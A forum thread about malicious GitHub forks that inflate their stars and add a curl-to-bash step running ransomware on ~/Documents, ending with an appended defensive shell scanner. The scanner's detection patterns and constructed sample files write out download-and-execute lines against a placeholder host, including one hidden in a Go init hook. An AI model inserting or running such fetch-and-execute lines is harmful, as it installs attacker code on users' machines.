agnos.is Forums

Supply chain attack on Github, malware injected in fork ransomwares Linux machines

37 Posts 27 Posters 0 Views
  • J [email protected]

    This isn't really a supply chain attack. It's more social engineering: fake users, forks, and non-verified code. They're taking advantage of the fact that most people don't use verified releases or packages code from open source projects.

    GitHub is not compromised, nor sending unintended payloads.

    ikidd@lemmy.worldI This user is from outside of this forum
    [email protected]
    wrote on last edited by
    #6

    Many of the projects are backend dev tools, like the Atlas provider linked in the thread.

    • S [email protected]

      lol, just checked. ~/Documents doesn't even exist on my machine.

      ikidd@lemmy.worldI This user is from outside of this forum
      [email protected]
      wrote on last edited by
      #7

      Me neither, I nuke the default freedesktop folders on an install because they clutter up my home folder. But I'd imagine we're the exception.

      • ikidd@lemmy.worldI [email protected]

        Many of the projects are backend dev tools, like the Atlas provider linked in the thread.

        J This user is from outside of this forum
        [email protected]
        wrote on last edited by
        #8

        But that's not a supply chain attack. If projects or platforms are compromised and THEN their code is used by normal means of ingestion of said project, that would be a supply chain attack.

        These are unofficial channels created as forks of existing projects in an attempt to fool users into using these instead.

        • ikidd@lemmy.worldI [email protected]

          Apparently there's a bunch of projects getting hit with this, fairly obscure ones though. Project gets forked, suddenly gets a pile of stars more than the original, and then there's a curl-bash pipe inserted into it that runs some ransomware that encrypts ~/Documents.

          About a dozen other projects linked in here from another developer (excuse the Reddit link): https://www.reddit.com/r/golang/comments/1jbzuot/someone_copied_our_github_project_made_it_look/

          thebardingreen@lemmy.starlightkel.xyzT This user is from outside of this forum
          [email protected]
          wrote on last edited by
          #9

          Joke's on them, I don't keep shit in ~/Documents, all my goodies are on a network share mounted at ~/Netstore

          • ? Guest

            use windows iif ytu dodn watn virus

            N This user is from outside of this forum
            [email protected]
            wrote on last edited by
            #10

            Tru. With Windows defender 💪 i can downloat evry .exe from ze internetz. I currently installing Gta 6 early 😎

            • thebardingreen@lemmy.starlightkel.xyzT [email protected]

              Joke's on them, I don't keep shit in ~/Documents, all my goodies are on a network share mounted at ~/Netstore

              H This user is from outside of this forum
              [email protected]
              wrote on last edited by
              #11

              Hahaha. Was about to comment nearly the same thing. My NFS share has a different mount. ~/Documents is an empty directory

              • ikidd@lemmy.worldI [email protected]

                Apparently there's a bunch of projects getting hit with this, fairly obscure ones though. Project gets forked, suddenly gets a pile of stars more than the original, and then there's a curl-bash pipe inserted into it that runs some ransomware that encrypts ~/Documents.

                About a dozen other projects linked in here from another developer (excuse the Reddit link): https://www.reddit.com/r/golang/comments/1jbzuot/someone_copied_our_github_project_made_it_look/

                mangopenguin@lemmy.blahaj.zoneM This user is from outside of this forum
                [email protected]
                wrote on last edited by
                #12

                It's an interesting thing to think about, wouldn't widespread desktop Linux malware be quite bad because of the lack of any AV/Malware detection typically used?

                • ? Guest

                  use windows iif ytu dodn watn virus

                  ikidd@lemmy.worldI This user is from outside of this forum
                  [email protected]
                  wrote on last edited by
                  #13

                  I'd rather have ass-cancer.

                  • J [email protected]

                    But that's not a supply chain attack. If projects or platforms are compromised and THEN their code is used by normal means of ingestion of said project, that would be a supply chain attack.

                    These are unofficial channels created as forks of existing projects in an attempt to fool users into using these instead.

                    ikidd@lemmy.worldI This user is from outside of this forum
                    [email protected]
                    wrote on last edited by
                    #14

                    OK, fair enough.

                    • thebardingreen@lemmy.starlightkel.xyzT [email protected]

                      Joke's on them, I don't keep shit in ~/Documents, all my goodies are on a network share mounted at ~/Netstore

                      D This user is from outside of this forum
                      [email protected]
                      wrote on last edited by
                      #15

                      I was going to say that too, ha!

                      • ? Guest

                        use windows iif ytu dodn watn virus

                        E This user is from outside of this forum
                        [email protected]
                        wrote on last edited by
                        #16

                        Sounds legit, thank you.

                        • ikidd@lemmy.worldI [email protected]

                          Apparently there's a bunch of projects getting hit with this, fairly obscure ones though. Project gets forked, suddenly gets a pile of stars more than the original, and then there's a curl-bash pipe inserted into it that runs some ransomware that encrypts ~/Documents.

                          About a dozen other projects linked in here from another developer (excuse the Reddit link): https://www.reddit.com/r/golang/comments/1jbzuot/someone_copied_our_github_project_made_it_look/

                          ? Offline
                          Guest
                          wrote on last edited by
                          #17

                          Another reason that star count is a terrible metric for quality / authenticity. Fake stars are a huge problem that not a lot of people take seriously.

                          • mangopenguin@lemmy.blahaj.zoneM [email protected]

                            It's an interesting thing to think about, wouldn't widespread desktop Linux malware be quite bad because of the lack of any AV/Malware detection typically used?

                            J This user is from outside of this forum
                            [email protected]
                            wrote on last edited by
                            #18

                            Uhhhhh, there's plenty of that being used. From the ground up. Security scanning out the wazzzz. Those are pattern-based scanners though, and this probably wouldn't be detected because it's a blob of binary junk with a script inside. GitHub should honestly put something on their storage backends to warn users, but that's a whole ball of wax people probably don't want to get into.

                            • mangopenguin@lemmy.blahaj.zoneM [email protected]

                              It's an interesting thing to think about, wouldn't widespread desktop Linux malware be quite bad because of the lack of any AV/Malware detection typically used?

                              S This user is from outside of this forum
                              [email protected]
                              wrote on last edited by
                              #19

                              It depends on the environment. I've been in a couple of places which use Linux for various professional purposes. At one site, all systems with a network connection were required to have A/V, on-access scanning and regular system scans. So, even the Linux systems had a full A/V agent and we were in the process of rolling out EDR to all Linux based hosts when I left. That was a site where security tended to be prioritized, though much of it was also "checkbox security". At another site, A/V didn't really exist on Linux systems and they were basically black boxes on the network, with zero security oversight. Last I heard, that was finally starting to change and Linux hosts were getting the full A/V and EDR treatment. Though, that's always a long process. I also see a similar level of complacency in "the cloud". Devs spin random shit up, give it a public IP, set the VPS to a default allow and act like it's somehow secure because, "it's in the cloud". Some of that will be Linux based. And in six months to a year, it's woefully out of date, probably running software with known vulnerabilities, fully exposed to the internet and the dev who spun it up may or may not be with the company anymore. Also, since they were "agile", the documentation for the system is filed under "lol, wut?"

                              Overall, I think Linux systems are a mixed bag. For a long time, they just weren't targeted with normal malware. And this led to a lot of complacency. Most sites I have been at have had a few Linux systems kicking about; but, because they were "one off" systems and from a certain sense of invulnerability they were poorly updated and often lacked a secure baseline configuration. The whole "Linux doesn't get malware" mantra was used to avoid security scrutiny. At the same time, Linux systems do tend to default to a more secure configuration. You're not going to get a BlueKeep type vulnerability from a default config. Still, it's not hard for someone who doesn't know any better to end up with a vulnerable system. And things like ransomware, password stealers, RATs or other basic attacks often run just fine in a user context. It's only when the attacker needs to get root that things get harder.

                              In a way, I'd actually appreciate a wide scale, well publicized ransomware attack on Linux systems. First off, it would show that Linux is finally big enough for attackers to care about. Second, it would provide concrete proof as to why Linux systems should be given as much attention and centrally managed/secured in the Enterprise. I know everyone hates dealing with IT for provisioning systems, and the security software sucks balls; but, given the constant barrage of attacks, those sorts of things really are needed.

                              • cralder@lemmy.worldC [email protected]

                                Average arch user

                                O This user is from outside of this forum
                                [email protected]
                                wrote on last edited by
                                #20

                                oh oh, I'm a below average arch user.
                                I suspect I copied most of my home from debian or something.

                                I'll rename it to Dickuments as a security feature.

                                • ? Guest

                                  use windows iif ytu dodn watn virus

                                  P This user is from outside of this forum
                                  [email protected]
                                  wrote on last edited by
                                  #21

                                  You can't get a virus if your computer's already dependent on one!

                                  • ? Guest

                                    use windows iif ytu dodn watn virus

                                    S This user is from outside of this forum
                                    [email protected]
                                    wrote on last edited by
                                    #22

                                    I tried that, I ended up with this weird "Windows 11" adware installed and couldn't get rid of it. There was also a problem with odd programs and advertising showing up in my Start Menu, even after I removed them. Also, my settings would occasionally just change, without my knowledge or permission.

                                    • O [email protected]

                                      oh oh, I'm a below average arch user.
                                      I suspect I copied most of my home from debian or something.

                                      I'll rename it to Dickuments as a security feature.

                                      L This user is from outside of this forum
                                      [email protected]
                                      wrote on last edited by
                                      #23

                                      Hackers gonna wanna Netflix and chill

                                      • ikidd@lemmy.worldI [email protected]

                                        Apparently there's a bunch of projects getting hit with this, fairly obscure ones though. Project gets forked, suddenly gets a pile of stars more than the original, and then there's a curl-bash pipe inserted into it that runs some ransomware that encrypts ~/Documents.

                                        About a dozen other projects linked in here from another developer (excuse the Reddit link): https://www.reddit.com/r/golang/comments/1jbzuot/someone_copied_our_github_project_made_it_look/

                                        aatube@kbin.melroy.orgA This user is from outside of this forum
                                        [email protected]
                                        wrote on last edited by
                                        #24

                                        Finally, Linux is popular enough to get targeted by malware!

                                        • ikidd@lemmy.worldI [email protected]

                                          Apparently there's a bunch of projects getting hit with this, fairly obscure ones though. Project gets forked, suddenly gets a pile of stars more than the original, and then there's a curl-bash pipe inserted into it that runs some ransomware that encrypts ~/Documents.

                                          About a dozen other projects linked in here from another developer (excuse the Reddit link): https://www.reddit.com/r/golang/comments/1jbzuot/someone_copied_our_github_project_made_it_look/

                                          P This user is from outside of this forum
                                          [email protected]
                                          wrote on last edited by
                                          #25

                                          Yay, finally Linux is being attacked!

                                          And as expected it takes a whole lot more than clicking on an email attachment

                                          Always check before you curl download something!

                                          R 1 Reply Last reply
                                          0
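
Added example, not part of any post in this thread: one way to act on "check before you curl" is to scan a cloned repository for lines that pipe a download into a shell before building or running anything from it. The patterns, the function names and the sample tree (built under a temp directory with `example.invalid` URLs) are constructed for this illustration.

```shell
#!/bin/sh
# Added example: list lines in a source tree that feed a download to a shell.
# Plain-text matches only; encoded or binary-embedded payloads are not covered.

# curl/wget output piped to sh, bash, zsh or dash (optionally via sudo)
PIPE_RE='(curl|wget)[^|]*\|[[:space:]]*(sudo[[:space:]]+(-[[:alnum:]]+[[:space:]]+)*)?(ba|z|da)?sh([^[:alnum:]_]|$)'
# a shell fed by $(curl ...) or <(curl ...)
SUBST_RE='(^|[^[:alnum:]_])(ba|z|da)?sh[[:space:]]+(-c[[:space:]]+)?.?(\$\(|<\()[[:space:]]*(curl|wget)'

scan_pipe_to_shell() {
    # -r recurse, -n line numbers, -I skip binary files, -E extended regex.
    # grep exits 1 on "no match"; treat that as success, keep real errors.
    grep -rnIE --exclude-dir=.git -e "$PIPE_RE" -e "$SUBST_RE" -- "$1" \
        || [ "$?" -eq 1 ]
}

make_sample_tree() {
    # Constructed sample: three lines that should be flagged, two that should not.
    d=$(mktemp -d) || return 1
    printf '%s\n' '# demo-tool (constructed sample)' 'Install:' \
        'curl -fsSL https://example.invalid/install.sh | bash' > "$d/README.md"
    printf '%s\n' 'package main' \
        'func init() { exec.Command("bash", "-c", "wget -qO- https://example.invalid/x | sh").Run() }' \
        > "$d/main.go"
    printf '%s\n' 'sh -c "$(curl -fsSL https://example.invalid/setup)"' > "$d/install.sh"
    # Benign: piping into a checksum tool, and a plain download to a file.
    printf '%s\n' 'curl -sSfL https://example.invalid/a.tar.gz | sha256sum -c a.sha256' \
        'curl -o out.tar.gz https://example.invalid/out.tar.gz' > "$d/checks.sh"
    printf '%s\n' "$d"
}

# Usage: sh scan.sh <path-to-clone>; with no argument, scan the sample tree.
if [ "$#" -gt 0 ]; then
    scan_pipe_to_shell "$1"
else
    sample=$(make_sample_tree)
    scan_pipe_to_shell "$sample"
    rm -rf "$sample"
fi
```

A hit is a line to read, not a verdict: many legitimate READMEs document a pipe-to-shell installer, so the useful signal is a match that the upstream project does not have.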